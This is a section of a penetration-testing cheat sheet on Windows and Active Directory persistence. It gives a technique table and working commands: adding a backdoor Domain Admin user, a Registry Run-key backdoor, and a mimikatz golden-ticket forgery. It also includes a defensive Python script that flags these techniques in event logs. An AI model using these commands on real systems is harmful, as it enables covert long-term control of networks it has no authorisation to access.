5b. Establishing Persistence

Goal: Maintain access to a compromised system across reboots, logoffs, or detection attempts.

Objectives

```mermaid
graph TD
    A[Privileged Access Achieved] --> B[Choose Persistence Method]
    B --> C[Create Local or Domain User]
    B --> D[Abuse Startup Tasks or Services]
    B --> E[Schedule Tasks or WMI Events]
    B --> F[Abuse GPO, ACLs, or RBCD]
    C --> G[Maintain Login Capability]
    D --> G
    E --> G
    F --> G
```

Techniques and Tools

| Technique | Tool/Command | Notes |
|---|---|---|
| Add Local Admin User | `net user /add`, `net localgroup administrators /add` | Adds hidden admin account |
| Add Domain User | `Add-DomainUser`, `Add-DomainGroupMember` | Requires domain-level privileges |
| Scheduled Task Backdoor | `schtasks /create`, `Register-ScheduledTask` | Executes payload at intervals or login |
| WMI Event Subscription | PowerShell, Eventvwr, WMIExplorer | Triggers persistent payload on system events |
| Registry Run Key | `reg add` | Executes payload on login (`HKCU...\Run`) |
| GPO Abuse | Modify existing GPO to run code or add users | Requires write access to GPO |
| ACL / DACL Abuse | `Get-DomainObjectACL`, `Set-Acl` | Add permissions to re-elevate later |
| Service Modification | Change binary path of existing service to malicious script | Common, especially for restartable services |
| Remote Scheduled Task or RDP | `schtasks /s`, `Enable-PSRemoting`, RDP w/ creds | Maintain access through legitimate tools |
| Kerberos Ticket Injection | Rubeus, mimikatz `kerberos::ptt` | Golden/Silver tickets for long-term domain access |

Example: Creating a Domain Backdoor User

```cmd
net user pentest Temp123! /add
net group "Domain Admins" pentest /add /domain
```

Example: Add Persistence with Registry

```cmd
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Users\Public\backdoor.exe"
```

Example: Golden Ticket with Mimikatz

```
kerberos::golden /user:hacker /domain:INLANEFREIGHT.LOCAL /sid:<domain_sid> /krbtgt:<ntlm_hash> /ptt
```
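The table and the three examples above show persistence from the operator's side. Every technique in that table leaves a record in Windows Security, System or Sysmon logs, and the following Python, added here as an example and not part of the original cheat sheet, shows the matching defender view: a triage pass that flags account creation (4720), privileged group changes (4728/4732/4756), Run-key writes (Sysmon 13), scheduled task creation (4698), WMI subscriptions (Sysmon 19/20/21), services installed from user-writable paths (7045), and service-ticket requests with no preceding TGT issuance (4769 without 4768, the classic forged-ticket heuristic). The event records are constructed samples flattened to dicts; the field names follow the real event XML, but the user-writable path list and the TGT/TGS pairing rule are assumptions, and the pairing rule only holds when every domain controller's 4768 events are in the window being examined.

```python
"""Triage Windows event records for the persistence techniques in the table above.

Added example, not part of the original cheat sheet. Field names follow the
real Security / System / Sysmon event XML; the records are constructed samples,
and USER_WRITABLE and the 4768/4769 pairing rule are assumptions.
"""
import re

# Groups whose membership changes merit an alert on their own.
PRIVILEGED_GROUPS = {"Domain Admins", "Administrators", "Enterprise Admins", "Schema Admins"}
GROUP_CHANGE_IDS = {4728, 4732, 4756}   # member added to a global / local / universal group
WMI_SUBSCRIPTION_IDS = {19, 20, 21}     # Sysmon: WmiEventFilter / WmiEventConsumer / binding
# Locations an unprivileged user can write to (assumed list); a service or task
# binary living here is the pattern the "Service Modification" row describes.
USER_WRITABLE = re.compile(
    r"^(?:C:\\Users\\|C:\\ProgramData\\|C:\\Windows\\Temp\\|.*\\AppData\\)", re.IGNORECASE)

# Constructed sample events (SID and hosts are placeholders), in arrival order.
SAMPLE_EVENTS = [
    {"id": 4720, "log": "Security", "host": "WS01", "SubjectUserName": "alice",
     "TargetUserName": "pentest"},
    {"id": 4728, "log": "Security", "host": "DC01", "SubjectUserName": "alice",
     "TargetUserName": "Domain Admins",
     "MemberName": "CN=pentest,CN=Users,DC=inlanefreight,DC=local"},
    {"id": 13, "log": "Sysmon", "host": "WS01", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-EXAMPLE\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\Public\backdoor.exe"},
    {"id": 4698, "log": "Security", "host": "WS01", "SubjectUserName": "alice",
     "TaskName": r"\Updater", "TaskContent": r"<Command>C:\Users\Public\backdoor.exe</Command>"},
    {"id": 4698, "log": "Security", "host": "WS01", "SubjectUserName": "SYSTEM",
     "TaskName": r"\Microsoft\Windows\DiskCleanup\SilentCleanup",
     "TaskContent": r"<Command>C:\Windows\System32\cleanmgr.exe</Command>"},
    {"id": 20, "log": "Sysmon", "host": "WS01", "Name": "Updater", "Type": "Command Line",
     "Destination": r"C:\Users\Public\backdoor.exe"},
    {"id": 7045, "log": "System", "host": "WS01", "ServiceName": "Spooler",
     "ImagePath": r"C:\Users\Public\svc.bat"},
    {"id": 4768, "log": "Security", "host": "DC01", "TargetUserName": "alice", "IpAddress": "10.10.10.20"},
    {"id": 4769, "log": "Security", "host": "DC01", "TargetUserName": "alice@INLANEFREIGHT.LOCAL",
     "IpAddress": "10.10.10.20"},
    {"id": 4769, "log": "Security", "host": "DC01", "TargetUserName": "hacker@INLANEFREIGHT.LOCAL",
     "IpAddress": "10.10.14.5"},
]


def _finding(ev, technique, severity, detail):
    return {"host": ev["host"], "event_id": ev["id"], "technique": technique,
            "severity": severity, "detail": detail}


def triage(events):
    """Return one finding per persistence indicator, in event order."""
    findings = []
    tgt_issued = set()  # accounts seen receiving a TGT (4768) earlier in the stream
    for ev in events:
        eid, log = ev["id"], ev["log"]
        if log == "Security" and eid == 4720:
            findings.append(_finding(ev, "Account creation", "medium",
                                     f"{ev['SubjectUserName']} created {ev['TargetUserName']}"))
        elif log == "Security" and eid in GROUP_CHANGE_IDS and ev["TargetUserName"] in PRIVILEGED_GROUPS:
            findings.append(_finding(ev, "Privileged group membership", "high",
                                     f"{ev['MemberName']} added to {ev['TargetUserName']} by {ev['SubjectUserName']}"))
        elif log == "Sysmon" and eid == 13 and "\\currentversion\\run" in ev["TargetObject"].lower():
            findings.append(_finding(ev, "Registry Run key", "high",
                                     f"{ev['Image']} set {ev['TargetObject']} = {ev['Details']}"))
        elif log == "Security" and eid == 4698:
            cmd = re.search(r"<Command>(.*?)</Command>", ev["TaskContent"])
            target = cmd.group(1) if cmd else "?"
            sev = "high" if USER_WRITABLE.match(target) else "low"
            findings.append(_finding(ev, "Scheduled task", sev, f"{ev['TaskName']} runs {target}"))
        elif log == "Sysmon" and eid in WMI_SUBSCRIPTION_IDS:
            findings.append(_finding(ev, "WMI event subscription", "high",
                                     f"{ev.get('Type', 'filter')} '{ev['Name']}' -> {ev.get('Destination', ev.get('Query', ''))}"))
        elif log == "System" and eid == 7045 and USER_WRITABLE.match(ev["ImagePath"]):
            findings.append(_finding(ev, "Service binary in user-writable path", "high",
                                     f"{ev['ServiceName']} -> {ev['ImagePath']}"))
        elif log == "Security" and eid == 4768:
            tgt_issued.add(ev["TargetUserName"].lower())  # 4768 carries the bare account name
        elif log == "Security" and eid == 4769:
            account = ev["TargetUserName"].split("@")[0].lower()  # 4769 carries user@REALM
            if account not in tgt_issued:
                findings.append(_finding(ev, "TGS without prior TGT (possible forged ticket)", "high",
                                         f"{ev['TargetUserName']} from {ev['IpAddress']} got a service ticket, no 4768 seen"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']:<6}] {f['host']} {f['event_id']:>5} {f['technique']}: {f['detail']}")
```

Each row of the table maps to one branch of `triage`, so a new technique is a new branch rather than a rewrite. The scheduled-task branch scores by where the task's command lives, which is why the constructed `SilentCleanup` task comes out `low` and the `\Updater` task `high`; the 4769 branch is deliberately the last one, because it only means something once all 4768 events from every DC are in the same stream.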

Pro Tips